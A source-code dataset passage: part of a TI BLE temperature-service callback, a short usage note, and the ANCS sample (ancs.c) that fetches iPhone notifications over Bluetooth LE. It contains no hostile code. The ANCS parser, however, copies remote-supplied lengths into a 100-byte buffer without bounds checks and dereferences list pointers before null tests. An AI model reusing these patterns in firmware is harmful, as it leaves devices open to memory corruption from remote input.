data\n * @param offset - offset of the first octet to be written\n * @param method - type of write message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Temperature_Service_WriteAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 len, uint16 offset,\n uint8 method )\n{\n bStatus_t status = SUCCESS;\n uint8_t paramID = 0xFF;\n\n // See if request is regarding a Client Characterisic Configuration\n if ( ! memcmp(pAttr->type.uuid, clientCharCfgUUID, pAttr->type.len) )\n {\n // Allow only notifications.\n status = GATTServApp_ProcessCCCWriteReq( connHandle, pAttr, pValue, len,\n offset, GATT_CLIENT_CFG_NOTIFY);\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_config_uuid, pAttr->type.len) )\n {\n if ( offset + len > TEMPERATURE_SERVICE_CONFIG_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == TEMPERATURE_SERVICE_CONFIG_LEN)\n paramID = TEMPERATURE_SERVICE_CONFIG;\n }\n }\n // See if request is regarding the Toggle_Temperature Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_period_uuid, pAttr->type.len) )\n {\n if ( offset + len > TEMPERATURE_SERVICE_PERIOD_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Copy pValue into the variable we point to from the attribute table.\n memcpy(pAttr->pValue + offset, pValue, len);\n\n // Only notify application if entire expected value is written\n if ( offset + len == TEMPERATURE_SERVICE_PERIOD_LEN)\n paramID = TEMPERATURE_SERVICE_PERIOD;\n }\n }\n else\n {\n /*\n * If we get here, that means you've forgotten to add an if clause for a\n * characteristic value attribute in the attribute table that has WRITE\n * permissions.\n */\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n // Let the application know something changed (if it did) by using the\n // callback it registered earlier (if it did).\n if (paramID != 0xFF)\n {\n if ( pAppCBs && pAppCBs->pfnChangeCb )\n {\n // Call app function from stack task context.\n pAppCBs->pfnChangeCb( paramID );\n }\n }\n return status;\n}\n"
},
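A usage note for the service above: an application publishes a reading through Temperature_Service_SetParameter(), which copies the value into the attribute table and, for the DATA parameter, lets GATTServApp_ProcessCharCfg() notify any client whose CCCD is enabled. The sketch below illustrates this under stated assumptions: the hypothetical helper name, the little-endian int16_t packing, and the premise that TEMPERATURE_SERVICE_DATA_LEN is at least 2 bytes are all illustrative rather than taken from the profile header.

```c
#include <stdint.h>
#include "temperature_service.h"

// Hypothetical application helper: push a new temperature reading to
// subscribed clients via the Temperature Service.
void App_publishTemperature(int16_t degreesC)
{
  uint8_t data[TEMPERATURE_SERVICE_DATA_LEN] = {0};

  // Illustrative little-endian packing (assumes the profile header
  // defines TEMPERATURE_SERVICE_DATA_LEN >= 2).
  data[0] = (uint8_t)(degreesC & 0xFF);
  data[1] = (uint8_t)((degreesC >> 8) & 0xFF);

  // Returns bleInvalidRange unless len matches the attribute length exactly;
  // on success, a GATT notification is sent if the client enabled the CCCD.
  Temperature_Service_SetParameter(TEMPERATURE_SERVICE_DATA,
                                   TEMPERATURE_SERVICE_DATA_LEN, data);
}
```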
{
"alpha_fraction": 0.618738055229187,
"alphanum_fraction": 0.631014883518219,
"avg_line_length": 29.66195297241211,
"blob_id": "df809e762e1eb37ed96421f02217e7230c984be0",
"content_id": "1819df105ac49a734f9226cde29c551a19406487",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 45533,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 1485,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src/app/ancs.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file ancs.c\n\n @brief This file contains the ANCS Application sample application for use\n with the CC2640R2 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *****************************************************************************/\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include \"string.h\"\n#include \"bcomdef.h\"\n#include <ti/display/Display.h>\n#include \"Board.h\"\n#include \"ancs.h\"\n#include \"ancs_app.h\"\n#include \"icall_ble_api.h\"\n\n\n/*********************************************************************\n * CONSTANTS\n */\n\n#define NOTIF_ATTR_REQUEST_METADATA_LENGTH 0x08\n#define DATA_BUFFER_SIZE 100\n\n#define REQUESTED_ATTR_ID_APPID 0x01\n#define REQUESTED_ATTR_ID_DS 0x02\n#define REQUESTED_ATTR_ID_TITLE 0x04\n#define REQUESTED_ATTR_ID_SUBTITLE 0x08\n#define REQUESTED_ATTR_ID_MESSAGE 0x10\n#define REQUESTED_ATTR_ID_MESSAGE_SIZE 0x20\n#define REQUESTED_ATTR_ID_DATE 0x40\n\n\n#define ATTR_APPID_REQUEST_SIZE 0\n#define ATTR_TITLE_REQUEST_SIZE 20\n#define ATTR_SUBTITLE_REQUEST_SIZE 30\n#define ATTR_MESSAGE_REQUEST_SIZE DATA_BUFFER_SIZE - 1\n#define ATTR_MESSAGE_SIZE_REQUEST_SIZE 0\n#define ATTR_DATE_REQUEST_SIZE 0\n\n\n/*********************************************************************\n * TYPEDEFS\n */\n\ntypedef struct\n{\n uint8_t categoryID;\n uint8_t notificationUID[4];\n uint8_t currentState;\n uint8_t requestedAttrs;\n} notifQueueData_t;\n\ntypedef struct notifQueueNode_t\n{\n notifQueueData_t notifData;\n struct notifQueueNode_t *pNext;\n} notifQueueNode_t;\n\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n// Stores the connection handle to the iPhone.\nuint16_t Ancs_connHandle;\n\n// Stores the state of 
the Data Source GATT notification processing function (Ancs_processDataServiceNotif()).\nuint8_t notifAttrPktProcessState;\n\n// Stores the state of the Data Source GATT notification processing function (Ancs_processAppAttr()).\nuint8_t appAttrPktProcessState;\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Used to stored the retrieved attribute data.\nstatic uint8_t dataBuf[DATA_BUFFER_SIZE] = { '\\0' };\n\n// Stores the length of the retrieved attribute data.\nstatic uint16_t dataLen = 0x0000;\n\n// Stores the notification ID of the head of the queue.\nstatic uint8_t currentNotifUID[ANCS_NOTIF_UID_LENGTH] = { 0x00 };\nstatic uint8_t incomingCallUID[ANCS_NOTIF_UID_LENGTH] = { 0x00 };\n\n// Holds the value for whether or not there is an incomingCall type notification in the queue.\nstatic bool haveIncomingCall = FALSE;\n\n// Points to the head of the queue.\nstatic notifQueueNode_t *pNotifQueueFront = NULL;\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\n\n// Basic link-list structure queue functions.\nstatic void Ancs_findAndRemoveFromQueue(uint8_t *pNotifUID);\nstatic notifQueueNode_t* Ancs_findNotifInQueue(uint8_t *pNotifUID);\n void Ancs_popAllNotifsFromQueue(void);\nstatic void Ancs_popNotifFromQueue(void);\nstatic void Ancs_pushNotifToQueue(uint8_t categoryID, uint8_t *pNotifUID);\nstatic bool Ancs_queueEmpty(void);\nstatic uint8_t Ancs_queueSize(void);\n\n// Functions used to process incoming GATT notifications from the\n// Notification Source and Data Source, and request additional data.\n void Ancs_acceptIncomingCall(void);\nstatic uint8_t Ancs_CCCDConfig(uint16_t attrHdl, uint8_t isEnable);\n void Ancs_declineIncomingCall(void);\nstatic uint8_t Ancs_getNotifAttr(uint8_t *pNotificationUID, uint8_t attributeID, uint16_t len);\nstatic uint8_t Ancs_getAppAttr(uint8_t *appID, uint8_t attributeID);\nstatic void Ancs_handleNotifAttrRsp(uint8_t *pNotificationUID);\nstatic uint8_t Ancs_performNegativeAction(uint8_t *notifUID);\nstatic uint8_t Ancs_performPositiveAction(uint8_t *notifUID);\nstatic void Ancs_processAppAttr(gattMsgEvent_t *pMsg);\n void Ancs_processDataServiceNotif(gattMsgEvent_t *pMsg);\nstatic void Ancs_processNotifications(void);\nstatic void Ancs_processNotificationServiceNotif(notifQueueNode_t *pNotif);\nstatic void Ancs_printNotifDate(uint8_t* dataBuf);\n void Ancs_queueNewNotif(gattMsgEvent_t *pMsg);\n uint8_t Ancs_subsDataSrc(void);\n uint8_t Ancs_subsNotifSrc(void);\n\n/*********************************************************************\n * QUEUE FUNCTIONS (In alphabetical order)\n */\n\n\n\n/*********************************************************************\n * @fn Ancs_findAndRemoveFromQueue\n *\n * @brief Find a specific notification and remove it from the queue\n *\n * @param pNotifUID - notification UID\n *\n * @return none\n */\nstatic void Ancs_findAndRemoveFromQueue(uint8_t *pNotifUID)\n{\n if (pNotifQueueFront == NULL)\n return;\n notifQueueNode_t *pSearch;\n notifQueueNode_t *pSearchLast;\n pSearch = pNotifQueueFront;\n pSearchLast = pNotifQueueFront;\n\n uint8_t notifUID[ANCS_NOTIF_UID_LENGTH];\n VOID memcpy(notifUID, pNotifUID, ANCS_NOTIF_UID_LENGTH);\n\n while ((memcmp(notifUID, pSearch->notifData.notificationUID, ANCS_NOTIF_UID_LENGTH) != 0) && pSearch != NULL)\n {\n pSearchLast = pSearch;\n pSearch = pSearch->pNext;\n }\n\n if (pSearch != NULL)\n {\n pSearchLast->pNext = pSearch->pNext;\n ICall_free(pSearch);\n Ancs_queueSize();\n }\n\n 
return;\n}\n\n/*********************************************************************\n * @fn Ancs_findNotifInQueue\n *\n * @brief Find a Notification & Category in the existing list\n *\n * @param pNotifUID - notification UID\n *\n * @return none\n */\nstatic notifQueueNode_t* Ancs_findNotifInQueue(uint8_t *pNotifUID)\n{\n notifQueueNode_t *pSearch;\n uint8_t notifUID[ANCS_NOTIF_UID_LENGTH];\n\n VOID memcpy(notifUID, pNotifUID, ANCS_NOTIF_UID_LENGTH);\n\n pSearch = pNotifQueueFront;\n while ((memcmp(notifUID, pSearch->notifData.notificationUID, ANCS_NOTIF_UID_LENGTH) != 0) && pSearch != NULL)\n {\n pSearch = pSearch->pNext;\n }\n\n if (pSearch == NULL) // Not in the list\n return NULL;\n\n else\n return pSearch;\n}\n\n/*********************************************************************\n * @fn Ancs_popAllNotifsFromQueue\n *\n * @brief Clear the queue of all notifications\n *\n * @param none\n *\n * @return none\n */\nvoid Ancs_popAllNotifsFromQueue(void)\n{\n notifQueueNode_t *pSearch;\n notifQueueNode_t *pDelete;\n\n pSearch = pNotifQueueFront;\n\n while (pSearch != NULL)\n {\n pDelete = pSearch;\n pSearch = pSearch->pNext;\n ICall_free(pDelete);\n pDelete = NULL;\n }\n pNotifQueueFront = NULL;\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_popNotifFromQueue\n *\n * @brief Move to the front of the queue to the next element and delete the old front\n *\n * @param none\n *\n * @return none\n */\nstatic void Ancs_popNotifFromQueue(void)\n{\n if ( pNotifQueueFront == NULL)\n return;\n\n notifQueueNode_t *pFrontOld;\n pFrontOld = pNotifQueueFront;\n\n pNotifQueueFront = pNotifQueueFront->pNext;\n ICall_free(pFrontOld);\n Ancs_queueSize();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_pushNotifToQueue\n *\n * @brief Add a Notification & Category to list\n *\n * @param categoryID - category ID of the notification\n * @param pNotifUID - notification UID\n *\n * @return none\n */\nstatic void Ancs_pushNotifToQueue(uint8_t categoryID, uint8_t *pNotifUID)\n{\n notifQueueNode_t *pNew;\n notifQueueNode_t *pSearch;\n\n pNew = ICall_malloc(sizeof(notifQueueNode_t));\n if (pNew == NULL)\n return;\n\n // Store categoryID and notification ID.\n pNew->notifData.categoryID = categoryID;\n VOID memcpy(pNew->notifData.notificationUID, pNotifUID, ANCS_NOTIF_UID_LENGTH);\n pNew->notifData.currentState = NOTI_ATTR_ID_BEGIN;\n pNew->notifData.requestedAttrs = 0;\n pNew->pNext = NULL;\n\n if (pNotifQueueFront == NULL) // New list\n {\n pNotifQueueFront = pNew;\n }\n else // Add to the last position of the list\n {\n pSearch = pNotifQueueFront;\n while (pSearch->pNext != NULL)\n {\n pSearch = pSearch->pNext;\n }\n pSearch->pNext = pNew;\n }\n Ancs_queueSize();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_queueEmpty\n *\n * @brief Indicate if the notification queue is empty or not.\n *\n * @param none\n *\n * @return bool - Return TRUE if pNotifQueueFront equals NULL, FALSE else.\n */\nstatic bool Ancs_queueEmpty(void)\n{\n return (pNotifQueueFront == NULL);\n}\n\n/*********************************************************************\n * @fn Ancs_queueSize\n *\n * @brief Print the current size of the notification queue.\n *\n * @param none\n *\n * @return uint8_t - Number of notifications in the queue.\n */\nstatic uint8_t Ancs_queueSize(void)\n{\n uint8_t notifCount = 0;\n notifQueueNode_t *pCount;\n pCount = pNotifQueueFront;\n\n while(pCount != 
NULL)\n {\n notifCount++;\n pCount = pCount->pNext;\n }\n Display_print1(dispHandle, 4, 0, \"Total Notifications:\\t%d\", notifCount);\n\n return notifCount;\n}\n\n/*********************************************************************\n * NOTIFICATION FUNCTIONS (In alphabetical order)\n */\n\n/*********************************************************************\n * @fn Ancs_acceptIncomingCall\n *\n * @brief Accept an incoming phone call.\n *\n * @param none\n *\n * @return none\n */\nvoid Ancs_acceptIncomingCall(void)\n{\n if(haveIncomingCall == TRUE)\n {\n Ancs_performPositiveAction(incomingCallUID);\n haveIncomingCall = FALSE;\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tAccept Incoming Call\");\n#endif\n Display_print0(dispHandle, 16, 0, \"Accepted Incoming Call\");\n }\n}\n\n/*********************************************************************\n * @fn Ancs_CCCDConfig\n *\n * @brief subscribe Notification Source.\n *\n * @param none.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic uint8_t Ancs_CCCDConfig(uint16_t attrHdl, uint8_t isEnable)\n{\n // Declare return variable status.\n uint8_t status;\n\n // Stores the GATT write request parameters.\n attWriteReq_t req;\n\n // Allocate memory for the request.\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, 2, NULL);\n\n // If the allocation failed, return FAILURE.\n if (req.pValue == NULL)\n status = FAILURE;\n\n // Else, prepare the request.\n else\n {\n // Set the data length to 2 (\"01\" = 2 bytes).\n req.len = 2;\n\n // If we are enabling notifications, set the write data to \"01\".\n if (isEnable == TRUE)\n {\n req.pValue[0] = LO_UINT16(GATT_CLIENT_CFG_NOTIFY);\n req.pValue[1] = HI_UINT16(GATT_CLIENT_CFG_NOTIFY);\n }\n\n // Else, disable notifications, thus set the write data to \"00\".\n else\n {\n req.pValue[0] = 0x00;\n req.pValue[1] = 0x00;\n }\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n // Set the handle to the passed value (either the Notification Source's CCCD handle\n // or the Data Source's CCCD handle).\n req.handle = attrHdl;\n\n // Send write request. 
If it fails, free the memory allocated and\n // return a failure.\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n if ( status != SUCCESS)\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_declineIncomingCall\n *\n * @brief Reject an incoming phone call.\n *\n * @param none\n *\n * @return none\n */\nvoid Ancs_declineIncomingCall(void)\n{\n if(haveIncomingCall == TRUE)\n {\n Ancs_performNegativeAction(incomingCallUID);\n haveIncomingCall = FALSE;\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDeclined Incoming Call\");\n#endif\n Display_print0(dispHandle, 16, 0, \"Declined Incoming Call\");\n }\n}\n\n/*********************************************************************\n * @fn Ancs_getNotifAttr\n *\n * @brief Get notification attributes.\n *\n * @param pNotificationUID - notification's ID.\n *\n * @param attributeID - attribute's ID.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic uint8_t Ancs_getNotifAttr(uint8_t *pNotificationUID, uint8_t attributeID, uint16_t len)\n{\n uint8_t status;\n uint8_t cmdLen = 8;\n if (len == 0)\n cmdLen = 6;\n\n // Do a write\n attWriteReq_t req;\n\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, cmdLen, NULL);\n uint8_t *requestPayload = req.pValue;\n if (req.pValue != NULL)\n {\n // Get the ANCS control point handle.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set command length.\n req.len = cmdLen;\n\n // Set Command ID.\n *requestPayload = COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES;\n requestPayload++;\n\n // Set NotificationUID\n VOID memcpy(requestPayload, pNotificationUID, ANCS_NOTIF_UID_LENGTH);\n requestPayload += ANCS_NOTIF_UID_LENGTH;\n\n // Set attributeID\n *requestPayload = attributeID;\n requestPayload++;\n\n // Set length to desired max length to be retrieved.\n *requestPayload = LO_UINT16(len);\n requestPayload++;\n *requestPayload = HI_UINT16(len);\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n // Execute the write.\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n if (status != SUCCESS)\n {\n // If it fails free the message.\n Display_print1(dispHandle, 10, 0, \"CP WRITE ERROR:\\t%d\",status);\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_getAppAttr\n *\n * @brief Get application attributes.\n *\n * @param appID - applciation's ID\n *\n * @param attributeID - attribute's ID.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic uint8_t Ancs_getAppAttr(uint8_t *appID, uint8_t attributeID)\n{\n uint8_t status;\n\n uint8_t *lenCheck = appID;\n uint8_t appIDLen = 0;\n\n while(*lenCheck != '\\0')\n {\n lenCheck++;\n appIDLen++;\n }\n\n // Add 1 for the NULL terminator.\n appIDLen++;\n\n\n // 1 for Command ID, Length of the AppID, 1 for the AttrID\n uint8_t cmdLen = 1 + appIDLen + 1;\n\n // Do a write\n attWriteReq_t req;\n\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, cmdLen, NULL);\n uint8_t *requestPayload = req.pValue;\n if (req.pValue != NULL)\n {\n // Get the ANCS control point handle.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set command length.\n req.len = cmdLen;\n\n // Set Command ID.\n *requestPayload = COMMAND_ID_GET_APP_ATTRIBUTES;\n requestPayload++;\n\n // Set AppID\n VOID memcpy(requestPayload, 
appID, appIDLen);\n requestPayload += appIDLen;\n\n // Set attributeID\n *requestPayload = attributeID;\n requestPayload++;\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n // Execute the write.\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n if (status != SUCCESS)\n {\n // If it fails free the message.\n Display_print1(dispHandle, 10, 0, \"CP WRITE ERROR:\\t%d\",status);\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_handleNotifAttrRsp\n *\n * @brief Handle response value of Notification Attributes from iOS device.\n *\n * @param attrID - attributes ID.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic void Ancs_handleNotifAttrRsp(uint8_t *pNotificationUID)\n{\n // Will store the queue node with the passed notification UID.\n notifQueueNode_t *pNode;\n\n // Retrieve the notification with the passed UID.\n pNode = Ancs_findNotifInQueue(pNotificationUID);\n\n switch ( pNode->notifData.currentState )\n {\n // The initial state is used to kick-off the state machine and\n // immediately proceed to the AppID state (hence the missing break).\n case NOTI_ATTR_ID_BEGIN:\n pNode->notifData.currentState = NOTI_ATTR_ID_APPID;\n\n // If the AppID request flag hasn't been set, request the AppID attribute\n // data and set the AppID request flag.\n case NOTI_ATTR_ID_APPID:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_APPID) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER, ATTR_APPID_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_APPID;\n }\n break;\n\n case APP_ATTR_ID_DN:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_DS) )\n {\n Ancs_getAppAttr(dataBuf, APP_ATTRIBUTE_ID_DISPLAY_NAME);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_DS;\n }\n break;\n\n // If the Title request flag hasn't been set, request the Title attribute\n // data and set the Title request flag.\n case NOTI_ATTR_ID_TITLE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_TITLE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_TITLE, ATTR_TITLE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_TITLE;\n }\n break;\n\n // If the Subtitle request flag hasn't been set, request the Subtitle attribute\n // data and set the Subtitle request flag.\n case NOTI_ATTR_ID_SUBTITLE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_SUBTITLE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_SUBTITLE, ATTR_SUBTITLE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_SUBTITLE;\n }\n break;\n\n // If the Message request flag hasn't been set, request the Message attribute\n // data and set the Message request flag.\n case NOTI_ATTR_ID_MESSAGE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_MESSAGE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_MESSAGE, ATTR_MESSAGE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_MESSAGE;\n }\n break;\n\n // If the Message Size request flag hasn't been set, request the Message Size attribute\n // data and set the Message Size request flag.\n case NOTI_ATTR_ID_MESSAGE_SIZE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_MESSAGE_SIZE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_MESSAGE_SIZE, ATTR_MESSAGE_SIZE_REQUEST_SIZE);\n 
pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_MESSAGE_SIZE;\n }\n break;\n\n // If the Date request flag hasn't been set, request the Date attribute\n // data and set the Date request flag.\n case NOTI_ATTR_ID_DATE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_DATE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_DATE, ATTR_DATE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_DATE;\n }\n break;\n\n // End state, do nothing but signify all requests have been made.\n case NOTI_ATTR_ID_END:\n break;\n\n default:\n break;\n\n }\n return;\n}\n\n\n/*********************************************************************\n * @fn Ancs_processAppAttr\n *\n * @brief Extract and reassemble the retrieved data from the Data Source notification (App attributes)\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nstatic void Ancs_processAppAttr(gattMsgEvent_t *pMsg)\n{\n // Pointer to the GATT Msg data.\n uint8_t *packetData;\n\n // The variable that will keep track of the ANCS attribute\n // currently being processed.\n static uint8_t AttrID;\n\n // The variable will keep track of the current index the data\n // buffer will be written to if more than one packet is needed.\n static uint8_t currentDataBufWriteIndex;\n\n // Point to the GATT Msg data\n packetData = pMsg->msg.handleValueNoti.pValue;\n\n // Check if this is the first retrieved packet for potentially\n // a set of packets to be sent by the ANCS Data Service.\n switch(notifAttrPktProcessState)\n {\n case NOTI_ATTR_FIRST_PKT:\n {\n // Tracks the metadata length of the first packet.\n uint8_t responseLen = 0;\n\n // Initialize the data buffer write index to zero, as this is\n // the first packet.\n currentDataBufWriteIndex = 0;\n\n // Ensure Command ID is equal to zero as stated in the spec.\n if (*packetData != COMMAND_ID_GET_APP_ATTRIBUTES)\n return;\n packetData++;\n responseLen++;\n\n // Skip the appID.\n while(*packetData != '\\0')\n {\n packetData++;\n responseLen++;\n }\n\n // Skip the NULL terminator.\n packetData++;\n responseLen++;\n\n // Store the ANCS attribute ID of the retrieved attribute.\n AttrID = *packetData;\n packetData++;\n responseLen++;\n\n // Store the 2-byte length of the data that is being retrieved.\n dataLen = BUILD_UINT16(*packetData, *(packetData + 1));\n\n // Check if the length is zero, if so the notification does not\n // have the specified attribute as stated in the ANCS spec.\n if ( dataLen == 0 )\n {\n if (AttrID == APP_ATTRIBUTE_ID_DISPLAY_NAME)\n Display_print0(dispHandle, 7, 0, \"* App Name:\\tNot available\");\n // pNotifQueueFront->notifData.currentState++;\n pNotifQueueFront->notifData.currentState++;\n Ancs_processNotifications();\n\n return;\n }\n\n // Move the pointer to the data portion.\n packetData += 2;\n responseLen += 2;\n\n // Clear the data buffer in preparation for the new data.\n VOID memset(dataBuf, '\\0', DATA_BUFFER_SIZE);\n\n // If the data length specified in the first ANCS Data Service notification\n // is greater than the number of bytes that was sent in the\n // first data packet(total GATT msg length - request metadata), the data will be split into multiple packets.\n if (dataLen > pMsg->msg.handleValueNoti.len - responseLen)\n {\n // Copy the number of bytes that were sent in the\n // first packet to the data buffer, then set the\n // data buffer write index, and set the state from first packet\n // to continued packet.\n VOID memcpy(dataBuf, packetData, (pMsg->msg.handleValueNoti.len - responseLen));\n 
currentDataBufWriteIndex = (pMsg->msg.handleValueNoti.len - responseLen);\n appAttrPktProcessState = NOTI_ATTR_CONTINUE_PKT;\n\n // Subtract the number of data bytes contained in the first packet\n // from the total number of expected data bytes.\n dataLen -= (pMsg->msg.handleValueNoti.len - responseLen);\n return;\n }\n else\n {\n // In this case all the ANCS attribute data was contained in\n // the first packet so the data is copied, and both the index and\n // length are reset.\n VOID memcpy(dataBuf, packetData, dataLen);\n currentDataBufWriteIndex = 0;\n dataLen = 0x0000;\n }\n }\n\n case NOTI_ATTR_CONTINUE_PKT:\n {\n if (dataLen > 0)\n {\n // Copy all the data from the notification packet to the data buffer\n // starting from the current data buffer write index.\n VOID memcpy(dataBuf + currentDataBufWriteIndex, pMsg->msg.handleValueNoti.pValue,\n pMsg->msg.handleValueNoti.len);\n // Subtract the number of data bytes contained in the packet from\n // the total, and increase the data buffer write index by that amount.\n dataLen -= pMsg->msg.handleValueNoti.len;\n currentDataBufWriteIndex += pMsg->msg.handleValueNoti.len;\n\n // Checks if this is the last continued packet.\n if (dataLen == 0x0000)\n {\n // If so reset the write index and the state.\n currentDataBufWriteIndex = 0;\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n }\n }\n break;\n\n default:\n break;\n }\n\n // The full attribute data has now been received; display it for the demo.\n // A real application would process the data here instead.\n if (dataLen == 0)\n {\n pNotifQueueFront->notifData.currentState++;\n\n if (AttrID == APP_ATTRIBUTE_ID_DISPLAY_NAME)\n Display_print1(dispHandle, 7, 0, \"* App Name:\\t%s\", (char* )dataBuf);\n }\n // Check if the dataLen variable overflowed because packets were mismatched.\n // This may occur when rapidly connecting to and disconnecting from the device.\n else if(dataLen > DATA_BUFFER_SIZE - 1)\n {\n Display_print0(dispHandle, 7, 0, \"* App Name:\\tDATA CORRUPTED\");\n Ancs_findAndRemoveFromQueue(currentNotifUID);\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n // Continue processing the current notification.\n Ancs_processNotifications();\n}\n\n/*********************************************************************\n * @fn Ancs_processDataServiceNotif\n *\n * @brief Extract and reassemble the retrieved data from the Data Source notifications\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nvoid Ancs_processDataServiceNotif(gattMsgEvent_t *pMsg)\n{\n // Pointer to the GATT Msg data.\n uint8_t *packetData;\n\n // The variable that will keep track of the ANCS attribute\n // currently being processed.\n static uint8_t AttrID;\n\n // The variable will keep track of the current index the data\n // buffer will be written to if more than one packet is needed.\n static uint8_t currentDataBufWriteIndex;\n\n // Point to the GATT Msg data\n packetData = pMsg->msg.handleValueNoti.pValue;\n\n // Check if this is the first retrieved packet for potentially\n // a set of packets to be sent by the ANCS Data Service.\n switch(notifAttrPktProcessState)\n 